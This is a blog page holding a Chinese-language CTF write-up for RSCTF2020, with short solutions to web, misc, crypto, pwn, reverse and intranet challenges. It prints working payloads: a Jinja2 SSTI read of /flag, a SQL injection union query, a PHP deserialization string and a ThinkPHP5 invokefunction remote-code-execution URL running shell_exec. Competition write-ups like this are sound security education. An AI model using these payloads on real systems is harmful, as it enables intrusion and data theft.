<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
    
  
  <link href="//cdn.jsdelivr.net/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet" type="text/css" />







  

<link href="//libs.cdnjs.net/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="https://ftp.bmp.ovh/imgs/2019/12/bd3cd769bf9c605a.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="https://ftp.bmp.ovh/imgs/2019/12/fe3214c96f68b465.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="https://ftp.bmp.ovh/imgs/2019/12/a585dbaa8519a606.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="CTF,writeup,RSCTF," />










<meta name="description" content="签到签到题关注两个公众号发送指定字符串即可 WEB1. 他们说php很弱打开网页，查看网页源代码看到submit.php的处理逻辑,那么自然想到数组绕过md5()的检查。那么按照这样来提交即可： 2. my sound查看返回的http header发现是一个python搭建的网站，那么猜测后端存在ssti漏洞，那么测试一下 123&amp;#123;% raw %&amp;#125;&amp;#123;&amp;#123;1+">
<meta name="keywords" content="CTF,writeup,RSCTF">
<meta property="og:type" content="article">
<meta property="og:title" content="RSCTF2020_writeup">
<meta property="og:url" content="http:&#x2F;&#x2F;mrjesen.github.io&#x2F;2020&#x2F;11&#x2F;16&#x2F;RSCTF2020writeup.html">
<meta property="og:site_name" content="Jesen&#39;s Blog">
<meta property="og:description" content="签到签到题关注两个公众号发送指定字符串即可 WEB1. 他们说php很弱打开网页，查看网页源代码看到submit.php的处理逻辑,那么自然想到数组绕过md5()的检查。那么按照这样来提交即可： 2. my sound查看返回的http header发现是一个python搭建的网站，那么猜测后端存在ssti漏洞，那么测试一下 123&amp;#123;% raw %&amp;#125;&amp;#123;&amp;#123;1+">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http:&#x2F;&#x2F;mrjesen.github.io&#x2F;images&#x2F;clip_image002-1605497495185.jpg">
<meta property="og:image" content="http:&#x2F;&#x2F;mrjesen.github.io&#x2F;images&#x2F;clip_image004-1605497495186.jpg">
<meta property="og:image" content="http:&#x2F;&#x2F;mrjesen.github.io&#x2F;images&#x2F;clip_image006-1605497495186.jpg">
<meta property="og:image" content="http:&#x2F;&#x2F;mrjesen.github.io&#x2F;images&#x2F;clip_image008-1605497495186.jpg">
<meta property="og:image" content="http:&#x2F;&#x2F;mrjesen.github.io&#x2F;images&#x2F;clip_image010-1605497495186.jpg">
<meta property="og:image" content="http:&#x2F;&#x2F;mrjesen.github.io&#x2F;images&#x2F;clip_image012-1605497495187.jpg">
<meta property="og:image" content="http:&#x2F;&#x2F;mrjesen.github.io&#x2F;images&#x2F;clip_image014.jpg">
<meta property="og:image" content="http:&#x2F;&#x2F;mrjesen.github.io&#x2F;images&#x2F;clip_image016.jpg">
<meta property="og:image" content="http:&#x2F;&#x2F;mrjesen.github.io&#x2F;images&#x2F;clip_image018.jpg">
<meta property="og:image" content="http:&#x2F;&#x2F;mrjesen.github.io&#x2F;images&#x2F;clip_image020.jpg">
<meta property="og:image" content="http:&#x2F;&#x2F;mrjesen.github.io&#x2F;images&#x2F;clip_image022.jpg">
<meta property="og:image" content="http:&#x2F;&#x2F;mrjesen.github.io&#x2F;images&#x2F;clip_image024.jpg">
<meta property="og:image" content="http:&#x2F;&#x2F;mrjesen.github.io&#x2F;images&#x2F;clip_image026.jpg">
<meta property="og:image" content="http:&#x2F;&#x2F;mrjesen.github.io&#x2F;images&#x2F;clip_image028.jpg">
<meta property="og:image" content="http:&#x2F;&#x2F;mrjesen.github.io&#x2F;images&#x2F;clip_image030.jpg">
<meta property="og:image" content="http:&#x2F;&#x2F;mrjesen.github.io&#x2F;images&#x2F;clip_image032.jpg">
<meta property="og:image" content="http:&#x2F;&#x2F;mrjesen.github.io&#x2F;images&#x2F;clip_image033.png">
<meta property="og:image" content="http:&#x2F;&#x2F;mrjesen.github.io&#x2F;images&#x2F;clip_image035.jpg">
<meta property="og:image" content="http:&#x2F;&#x2F;mrjesen.github.io&#x2F;images&#x2F;clip_image037.jpg">
<meta property="og:image" content="http:&#x2F;&#x2F;mrjesen.github.io&#x2F;images&#x2F;clip_image039.jpg">
<meta property="og:image" content="http:&#x2F;&#x2F;mrjesen.github.io&#x2F;images&#x2F;clip_image040.png">
<meta property="og:image" content="http:&#x2F;&#x2F;mrjesen.github.io&#x2F;images&#x2F;clip_image042.jpg">
<meta property="og:updated_time" content="2020-11-16T03:48:27.816Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http:&#x2F;&#x2F;mrjesen.github.io&#x2F;images&#x2F;clip_image002-1605497495185.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://mrjesen.github.io/2020/11/16/RSCTF2020writeup.html"/>





  <title>RSCTF2020_writeup | Jesen's Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Jesen's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <h1 class="site-subtitle" itemprop="description">想要人前装逼,必须得在人后学习</h1>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/#" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/#%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/#%20" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/#" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://mrjesen.github.io/2020/11/16/RSCTF2020writeup.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Jesen">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/jesen.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Jesen's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h2 class="post-title" itemprop="name headline">RSCTF2020_writeup</h2>
        

        <div class="post-meta">
          <span class="post-time">
			
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-11-16T11:30:17+08:00">
                2020-11-16
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/writeup/" itemprop="url" rel="index">
                    <span itemprop="name">writeup</span>
                  </a>
                </span>

                
                
                  ， 
                
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/writeup/CTF/" itemprop="url" rel="index">
                    <span itemprop="name">CTF</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2020/11/16/RSCTF2020writeup.html#comments" itemprop="discussionUrl">
                  <span class="post-comments-count valine-comment-count" data-xid="/2020/11/16/RSCTF2020writeup.html" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          
             <span id="/2020/11/16/RSCTF2020writeup.html" class="leancloud_visitors" data-flag-title="RSCTF2020_writeup">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">阅读次数&#58;</span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="签到"><a href="#签到" class="headerlink" title="签到"></a><strong>签到</strong></h2><p>签到题关注两个公众号发送指定字符串即可</p>
<h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a><strong>WEB</strong></h2><h3 id="1-他们说php很弱"><a href="#1-他们说php很弱" class="headerlink" title="1. 他们说php很弱"></a><strong>1.</strong> <strong>他们说php很弱</strong></h3><p>打开网页，查看网页源代码看到submit.php的处理逻辑,那么自然想到数组绕过md5()的检查。那么按照这样来提交即可：<img src="/images/clip_image002-1605497495185.jpg" alt="img"></p>
<h3 id="2-my-sound"><a href="#2-my-sound" class="headerlink" title="2. my sound"></a><strong>2. my sound</strong></h3><p>查看返回的http header发现是一个python搭建的网站，那么猜测后端存在ssti漏洞，那么测试一下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;% raw %&#125;</span><br><span class="line">&#123;&#123;1+3&#125;&#125;</span><br><span class="line">&#123;% endraw %&#125;</span><br></pre></td></tr></table></figure>

<p><img src="/images/clip_image004-1605497495186.jpg" alt="img"></p>
<p>可以看到1+3被执行了，那么使用网上公开的payload打就行了。</p>
<p>给个payload: </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;% raw %&#125;</span><br><span class="line">&#123;&#123;().__class__.__bases__[0].__subclasses__()[80].__init__.__globals__.__builtins__[&apos;open&apos;](&apos;/flag&apos;).read()&#125;&#125;</span><br><span class="line">&#123;% endraw %&#125;</span><br></pre></td></tr></table></figure>

<h3 id="3-hash"><a href="#3-hash" class="headerlink" title="3. hash"></a><strong>3. hash</strong></h3><p>把密文扔进网站解密: <img src="/images/clip_image006-1605497495186.jpg" alt="img"></p>
<p>无奈发现需要付费，根据一共四位，而且是f开头猜测可能是fuck或者是flag</p>
<p>试了一下其实是flag这四个字符加密后的</p>
<p>那么直接根据源代码的逻辑直接访问/?act=user&amp;point=flag</p>
<p>即可拿到flag</p>
<h3 id="4-简单的sql注入"><a href="#4-简单的sql注入" class="headerlink" title="4. 简单的sql注入"></a><strong>4.</strong> <strong>简单的sql注入</strong></h3><p>表名是猜的users，通过注入获取密码：</p>
<p>使用的payload：</p>
<p>username=admin’ and 0 union select password,2 from users#&amp;password=aaa</p>
<p>得到: <img src="/images/clip_image008-1605497495186.jpg" alt="img"></p>
<p>解密MD5得到密码为:ctf2020</p>
<p>登录即可得到flag：<img src="/images/clip_image010-1605497495186.jpg" alt="img"></p>
<h3 id="5-trick"><a href="#5-trick" class="headerlink" title="5.trick"></a><strong>5.trick</strong></h3><p>原理就是</p>
<p>str_1 = “INF”</p>
<p>str_2 = 9e999999999999(由于这个数太大了，针对特大的数php直接表示为INF)</p>
<p>虽然反序列化后依然是double类型，但是这样就可以绕过判断，因为md5加密之前会把参数强制转为字符串类型，这样str_1==str_2==”INF” 了，至于get的传参是通过查阅文档得到的:</p>
<p><img src="/images/clip_image012-1605497495187.jpg" alt="img"></p>
<p><img src="/images/clip_image014.jpg" alt="img"></p>
<p>文档写道，会把[变成下划线，而且针对[后面的字符不会把.变成_</p>
<p>所以最终payload为:</p>
<p><a href="http://183.220.1.118:18471/?my[secret.key=O:8:&quot;get_flag&quot;:2:{s:5:&quot;str_1&quot;;s:3:&quot;INF&quot;;s:5:&quot;str_2&quot;;d:INF;}" target="_blank" rel="noopener">http://183.220.1.118:18471/?my[secret.key=O:8:&quot;get_flag&quot;:2:{s:5:&quot;str_1&quot;;s:3:&quot;INF&quot;;s:5:&quot;str_2&quot;;d:INF;}</a></p>
<h2 id="MISC"><a href="#MISC" class="headerlink" title="MISC"></a><strong>MISC</strong></h2><h3 id="1-好可爱的加密"><a href="#1-好可爱的加密" class="headerlink" title="1. 好可爱的加密"></a><strong>1.</strong> <strong>好可爱的加密</strong></h3><p>aaencode加密，直接解密即可</p>
<h3 id="2-奇怪的码"><a href="#2-奇怪的码" class="headerlink" title="2. 奇怪的码"></a><strong>2.</strong> <strong>奇怪的码</strong></h3><p>可以看到是一个二维码（附件名字就png，把名字改成1.png就能打开了），发现此二维码缺少三个定位点导致扫描不到。那么利用任意软件把定位点补全即可。</p>
<p>扫描得到flag</p>
<h3 id="3-小姐姐"><a href="#3-小姐姐" class="headerlink" title="3.小姐姐"></a><strong>3.小姐姐</strong></h3><p>这个利用linux（kali）的strings xiaojiejie.jpg即可看到里面有flag{xjj_haokanma}的字符串，提交即可</p>
<h3 id="4-神秘的文件"><a href="#4-神秘的文件" class="headerlink" title="4. 神秘的文件"></a><strong>4.</strong> <strong>神秘的文件</strong></h3><p>打开发现是一个wireshark的数据包，利用 文件-导出http对象，把html文件导出即可</p>
<p>导出hehe.html:</p>
<p>发现代码的js被加密了，调试解密:</p>
<p><img src="/images/clip_image016.jpg" alt="img"></p>
<p>p就是解密后的:</p>
<p><img src="/images/clip_image018.jpg" alt="img"></p>
<p>逻辑有点啰嗦，直接在加密之前打印就行了</p>
<p><img src="/images/clip_image020.jpg" alt="img"></p>
<p>得到: flag{3c32b1cf66c70ae2178fd417fd051b3b}</p>
<p>其实原理就是hex加密flag</p>
<h3 id="5-GIF的秘密"><a href="#5-GIF的秘密" class="headerlink" title="5. GIF的秘密"></a><strong>5. GIF的秘密</strong></h3><p>扫描二维码，解base64，得到密码：0K_I_L0Ve_You_too</p>
<p>给的文件是个压缩包，需要改拓展名，改了之后输入给的密码解压即可。</p>
<p>解压完是一个缺文件头和文件为的gif图，用010editor修补一下文件头和文件尾即可，</p>
<p>然后使用stegsolve查看每一帧，最后一帧是flag，提交即可。</p>
<p><strong>6.</strong> <strong>探测卫星</strong></p>
<p>RX-SSTV mmsstv均可解码。</p>
<p><img src="/images/clip_image022.jpg" alt="img"></p>
<p>**<br>**</p>
<h2 id="CRYPTO"><a href="#CRYPTO" class="headerlink" title="CRYPTO"></a><strong>CRYPTO</strong></h2><h3 id="1-凯撒的宝藏"><a href="#1-凯撒的宝藏" class="headerlink" title="1.凯撒的宝藏"></a>1.凯撒的宝藏</h3><p>凯撒密码，在网上找了个脚本（网上的解密网站只能变换字母，这个是可以变换所有字符的）</p>
<p><img src="/images/clip_image024.jpg" alt="img"></p>
<p><img src="/images/clip_image026.jpg" alt="img"></p>
<p>然后把看着像密文的，用栅栏解密得到：</p>
<p>flag{cca604a6-fc10-4b8b-bf80-5076dce5b992}</p>
<h3 id="2-学密码从RSA开始"><a href="#2-学密码从RSA开始" class="headerlink" title="2. 学密码从RSA开始:"></a><strong>2.</strong> <strong>学密码从RSA开始:</strong></h3><p>链接后得到n e c</p>
<p>这个e太小了，直接给c开三次方即可得到明文的hex。</p>
<p><img src="/images/clip_image028.jpg" alt="img"></p>
<p>得到: 666c61677b64326338636462342d373561362d343031382d623133372d3539363037613139656332637d</p>
<p>hex转字符串得到：</p>
<p>flag{d2c8cdb4-75a6-4018-b137-59607a19ec2c}</p>
<h2 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a><strong>PWN</strong></h2><h3 id="1-CTFer"><a href="#1-CTFer" class="headerlink" title="1. CTFer"></a><strong>1. CTFer</strong></h3><p>偏移直接看ida，给了target函数，且未开任何保护</p>
<p>那么直接栈溢出覆盖RIP即可</p>
<p><img src="/images/clip_image030.jpg" alt="img"></p>
<h3 id="2-SHer"><a href="#2-SHer" class="headerlink" title="2. SHer"></a><strong>2. SHer</strong></h3><p>这个我感觉出题人忘记开保护了，直接导致和第一题一样了。</p>
<p>同样也是直接栈溢出覆盖RIP即可</p>
<p><img src="/images/clip_image032.jpg" alt="img"></p>
<h3 id="3-localover"><a href="#3-localover" class="headerlink" title="3. localover"></a><strong>3. localover</strong></h3><p><img src="/images/clip_image033.png" alt="img"></p>
<h3 id="4-random"><a href="#4-random" class="headerlink" title="4. random"></a><strong>4. random</strong></h3><p>这个原理其实是因为c语言需要给随机数设置种子，这题并没有，导致随机数始终是一个序列。经过测试，第一个随机数是0x6b8b4567</p>
<p>那么异或后结果就是2042590654</p>
<h3 id="5-assqww"><a href="#5-assqww" class="headerlink" title="5. assqww"></a><strong>5. assqww</strong></h3><p>思路就是泄露栈地址，然后根据栈地址的偏移，把两个变量覆盖成正确的。</p>
<p>吐了，研究一天的写got表，早知道先研究泄露内存了。</p>
<p><img src="/images/clip_image035.jpg" alt="img"></p>
<h2 id="REVERSE"><a href="#REVERSE" class="headerlink" title="REVERSE"></a><strong>REVERSE</strong></h2><h3 id="re1"><a href="#re1" class="headerlink" title="re1:"></a><strong>re1</strong>:</h3><p>直接记事本打开搜索flag即可</p>
<h3 id="re2"><a href="#re2" class="headerlink" title="re2:"></a><strong>re2:</strong></h3><p>ida打补丁，patch “jnz short loc_40114B”的jnz改成jz然后保存修改然后运行即可。</p>
<h3 id="re3"><a href="#re3" class="headerlink" title="re3:"></a><strong>re3:</strong></h3><p>直接angr秒了:</p>
<p><img src="/images/clip_image037.jpg" alt="img"></p>
<p>得到结果：<img src="/images/clip_image039.jpg" alt="img"></p>
<p>f5ce2c9f4a3e6aa21c786dba5301224c</p>
<p>用flag{}包裹即可</p>
<h3 id="re5"><a href="#re5" class="headerlink" title="re5:"></a><strong>re5:</strong></h3><p>ida的findcrypto插件找出了base64码表，那么把里面的字符串拼接好按base64解码即可。</p>
<p>这里有一个坑就是ida的字符串是按小端序存在的，因此需要把每一个字符串给逆过来。</p>
<p><img src="/images/clip_image040.png" alt="img"></p>
<p>解密得到：95a1446a7120e4af5c0c8878abb7e6d2</p>
<p>包裹上flag{}提交即可.</p>
<h3 id="re6"><a href="#re6" class="headerlink" title="re6:"></a><strong>re6:</strong></h3><p>直接看ida，找到主函数，</p>
<p>看代码，<img src="/images/clip_image042.jpg" alt="img"></p>
<p>操作选择42330</p>
<p>然后随便输入两个数即可拿到flag</p>
<h2 id="Intranet"><a href="#Intranet" class="headerlink" title="Intranet"></a><strong>Intranet</strong></h2><h3 id="DMZ"><a href="#DMZ" class="headerlink" title="DMZ:"></a><strong>DMZ:</strong></h3><p>thinkphp5，直接拿payload打就可以了:</p>
<p><a href="http://192.168.2.109/public/index.php?s=/index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=shell_exec&amp;vars[1][]=cat" target="_blank" rel="noopener">http://192.168.2.109/public/index.php?s=/index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=shell_exec&amp;vars[1][]=cat</a> /flag</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/CTF/" rel="tag"># CTF</a>
          
            <a href="/tags/writeup/" rel="tag"># writeup</a>
          
            <a href="/tags/RSCTF/" rel="tag"># RSCTF</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/08/24/qwb2020.html" rel="next" title="强网杯2020部分writeup">
                <i class="fa fa-chevron-left"></i> 强网杯2020部分writeup
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
    </div>
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/jesen.jpg"
                alt="Jesen" />
            
              <p class="site-author-name" itemprop="name">Jesen</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/#%7C%7C%20archive">
              
                  <span class="site-state-item-count">15</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">15</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/mrjesen" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="/#暂不公开" target="_blank" title="Telegram">
                      
                        <i class="fa fa-fw fa-github"></i>Telegram</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://www.zhihu.com/people/xlv5/#" target="_blank" title="知乎">
                      
                        <i class="fa fa-fw fa-compass"></i>知乎</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="/#" target="_blank" title="微博">
                      
                        <i class="fa fa-fw fa-weibo"></i>微博</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.bugku.com" title="Bugku" target="_blank">Bugku</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://yml-sec.top/" title="yemoli" target="_blank">yemoli</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#签到"><span class="nav-number">1.</span> <span class="nav-text">签到</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#WEB"><span class="nav-number">2.</span> <span class="nav-text">WEB</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-他们说php很弱"><span class="nav-number">2.1.</span> <span class="nav-text">1. 他们说php很弱</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-my-sound"><span class="nav-number">2.2.</span> <span class="nav-text">2. my sound</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-hash"><span class="nav-number">2.3.</span> <span class="nav-text">3. hash</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-简单的sql注入"><span class="nav-number">2.4.</span> <span class="nav-text">4. 简单的sql注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-trick"><span class="nav-number">2.5.</span> <span class="nav-text">5.trick</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#MISC"><span class="nav-number">3.</span> <span class="nav-text">MISC</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-好可爱的加密"><span class="nav-number">3.1.</span> <span class="nav-text">1. 好可爱的加密</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-奇怪的码"><span class="nav-number">3.2.</span> <span class="nav-text">2. 奇怪的码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-小姐姐"><span class="nav-number">3.3.</span> <span class="nav-text">3.小姐姐</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-神秘的文件"><span class="nav-number">3.4.</span> <span class="nav-text">4. 神秘的文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-GIF的秘密"><span class="nav-number">3.5.</span> <span class="nav-text">5. GIF的秘密</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CRYPTO"><span class="nav-number">4.</span> <span class="nav-text">CRYPTO</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-凯撒的宝藏"><span class="nav-number">4.1.</span> <span class="nav-text">1.凯撒的宝藏</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-学密码从RSA开始"><span class="nav-number">4.2.</span> <span class="nav-text">2. 学密码从RSA开始:</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#PWN"><span class="nav-number">5.</span> <span class="nav-text">PWN</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-CTFer"><span class="nav-number">5.1.</span> <span class="nav-text">1. CTFer</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-SHer"><span class="nav-number">5.2.</span> <span class="nav-text">2. SHer</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-localover"><span class="nav-number">5.3.</span> <span class="nav-text">3. localover</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-random"><span class="nav-number">5.4.</span> <span class="nav-text">4. random</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-assqww"><span class="nav-number">5.5.</span> <span class="nav-text">5. assqww</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#REVERSE"><span class="nav-number">6.</span> <span class="nav-text">REVERSE</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#re1"><span class="nav-number">6.1.</span> <span class="nav-text">re1:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#re2"><span class="nav-number">6.2.</span> <span class="nav-text">re2:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#re3"><span class="nav-number">6.3.</span> <span class="nav-text">re3:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#re5"><span class="nav-number">6.4.</span> <span class="nav-text">re5:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#re6"><span class="nav-number">6.5.</span> <span class="nav-text">re6:</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Intranet"><span class="nav-number">7.</span> <span class="nav-text">Intranet</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#DMZ"><span class="nav-number">7.1.</span> <span class="nav-text">DMZ:</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Jesen</span>

  
</div>






  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a></div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="//cdn.jsdelivr.net/jquery/2.1.3/jquery.min.js"></script>
  

  
  
